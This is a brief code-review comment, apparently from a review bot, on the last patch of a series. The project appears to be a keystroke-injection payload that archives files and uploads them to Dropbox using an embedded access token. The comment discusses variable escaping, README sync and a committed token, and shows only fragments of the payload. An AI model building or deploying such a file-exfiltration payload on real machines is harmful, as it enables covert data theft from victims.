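Review bot: On PATCH 7/7: escaping the PowerShell variables as `\$filePath`, `\$headers`, `\$fileContent` while leaving the bash variables `$ARCHIVE_NAME`, `$DROPBOX_FOLDER_PATH`, `$ACCESS_TOKEN` and `$DROPBOX_CONST_LINK` unescaped is consistent, but the hunk also removes the `$accessToken` assignment and interpolates `$ACCESS_TOKEN` straight into the `Authorization` header, so the README's "4°" example (`[102] QUACK STRING $accessToken = "..."`) no longer corresponds to any line in payload.txt and must be updated in the same commit. The `-replace \"\\\"` pattern from PATCH 5/7 is carried over unchanged. After seven revisions the file still opens with the committed `ACCESS_TOKEN=` value; that should block merge until it is a placeholder and the README's "Alert!" paragraph is removed.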